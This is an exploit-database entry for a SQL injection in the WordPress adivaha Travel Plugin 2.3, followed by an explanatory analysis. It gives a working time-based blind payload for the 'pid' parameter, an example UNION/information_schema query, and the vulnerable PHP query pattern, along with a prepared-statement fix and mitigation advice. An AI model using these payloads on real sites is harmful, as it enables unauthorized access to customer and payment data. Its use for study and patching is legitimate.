WordPress adivaha Travel Plugin 2.3 - SQL Injection

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-08-04 
# Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: adivaha - Travel Tech Company
# Vendor Homepage: https://www.adivaha.com/
# Software Link: https://wordpress.org/plugins/adiaha-hotel/
# Demo: https://www.adivaha.com/demo/adivaha-online/
# Version: 2.3
# Tested on: Windows 10 Pro
# Impact: Database Access


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.



Path: /mobile-app/v3/

GET parameter 'pid' is vulnerable to SQL Injection

https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot

---
Parameter: pid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot
---



[-] Done


WordPress adivaha Travel Plugin 2.3 – SQL Injection Vulnerability: A Deep Dive into Exploitation and Remediation

Security vulnerabilities in widely used WordPress plugins pose a significant threat to web applications, especially when they involve direct access to database systems. One such critical flaw was recently discovered in the adivaha Travel Plugin 2.3, a popular plugin developed by adivaha – Travel Tech Company, which enables hotel booking and travel management functionality for WordPress-based websites.

Overview of the Vulnerability

The vulnerability lies in the GET parameter pid within the mobile API endpoint: /mobile-app/v3/. This endpoint is designed to retrieve travel or hotel data based on a unique identifier, but due to improper input sanitization and lack of parameterized queries, it becomes susceptible to SQL injection attacks.

Attackers can exploit this flaw by injecting malicious SQL payloads directly into the pid parameter, leading to unintended database queries. The vulnerability has been confirmed as a time-based blind SQL injection, meaning that the attacker deduces the validity of their payload based on response time delays, rather than visible error messages.

Exploitation Details

According to the exploit report published on July 29, 2023, by security researcher CraCkEr, the following payload demonstrates the vulnerability:


https://website/mobile-app/v3/?pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot

This payload uses a MySQL-specific time-based blind injection technique. The core mechanism relies on the SLEEP() function, which causes the database to pause execution for a specified duration (in this case, 6 seconds). If the server responds with a delayed HTTP response, it confirms that the injected SQL query was executed.

Let’s break down the payload:

  • 77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z – This is a crafted string where the XOR operator is used to bypass simple string filtering.
  • SLEEP(6) – Causes the database to delay execution for 6 seconds, providing a measurable time difference.
  • The nested query (SELECT(0)FROM(SELECT(SLEEP(6)))a) is syntactically valid in MySQL and triggers the delay when executed.

When this payload is sent to the server, a noticeable delay occurs if the database processes the query. This delay confirms that the pid parameter is vulnerable to SQL injection.

Impact and Risks

Impact Category Description
Data Exposure Attackers can extract sensitive data such as user credentials, booking details, and payment information via advanced SQL injection techniques.
Data Manipulation Malicious actors can modify or delete records, potentially disrupting bookings or altering pricing.
Service Disruption Excessive or poorly crafted payloads can overload the database, leading to denial-of-service (DoS) conditions.
Reputation Damage Compromised data can lead to loss of customer trust and regulatory penalties (e.g., GDPR violations).

Given that the plugin is used by travel platforms, the risk extends beyond technical exposure. A breach could expose thousands of user records, potentially leading to identity theft, financial fraud, or blackmail.

Real-World Use Case

Consider a scenario where a malicious actor targets a travel booking site using this plugin. By chaining multiple time-based injections, they could extract the database schema, identify tables containing user data, and eventually retrieve sensitive fields like email, password_hash, and credit_card using advanced techniques like UNION SELECT or information_schema queries.

For example, an attacker might craft a payload like:


pid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM information_schema.tables WHERE table_schema='adivaha_db' LIMIT 1

Such a query could reveal the names of database tables, enabling further exploitation.

Root Cause Analysis

The vulnerability stems from a lack of input validation and parameterized queries in the plugin’s backend logic. The code likely performs a direct SQL query using user-supplied pid values without escaping or sanitizing the input:


$query = "SELECT * FROM hotels WHERE id = '$pid'";
$result = mysqli_query($connection, $query);

This approach is a classic example of dynamic SQL construction, which opens the door to injection attacks. Even if the input is numeric, attackers can bypass validation by using string payloads containing SQL constructs.

Recommended Fixes and Best Practices

To prevent such vulnerabilities, developers should adopt the following security practices:

  • Use Prepared Statements: Replace dynamic queries with parameterized ones using mysqli_prepare() or PDO.
  • Input Sanitization: Validate that pid is numeric and within expected ranges before processing.
  • Rate Limiting: Implement rate limiting on API endpoints to prevent abuse of time-based attacks.
  • Logging and Monitoring: Log suspicious requests and monitor for patterns indicating SQL injection attempts.
  • Regular Security Audits: Conduct automated and manual penetration testing on all plugins.

Here is a corrected, secure version of the query using PDO:


$pdo = new PDO("mysql:host=localhost;dbname=adivaha_db", $user, $pass);
$stmt = $pdo->prepare("SELECT * FROM hotels WHERE id = ?");
$stmt->execute([$pid]);
$result = $stmt->fetchAll();

This approach ensures that the pid value is treated as a parameter, not part of the SQL string, making injection impossible.

Vendor Response and Mitigation

As of the report date, the adivaha company has not publicly disclosed a patch or update for version 2.3. However, the plugin is hosted on the WordPress Plugin Repository, and users are advised to:

  • Update to the latest version (if available).
  • Disable the plugin if no update is released.
  • Use a web application firewall (WAF) to block known SQL injection patterns.
  • Monitor logs for unusual API behavior.

Additionally, the WordPress community should encourage developers to report vulnerabilities promptly and maintain transparent security update policies.

Conclusion

The adivaha Travel Plugin 2.3 SQL injection vulnerability is a stark reminder of how even seemingly benign endpoints can become attack vectors when security is overlooked. With the rise of automated tools and exploit databases, such flaws can be weaponized quickly.

For developers and site administrators, this incident underscores the importance of secure coding practices, continuous monitoring, and proactive vulnerability management. A single weak point in a plugin can compromise an entire website’s integrity.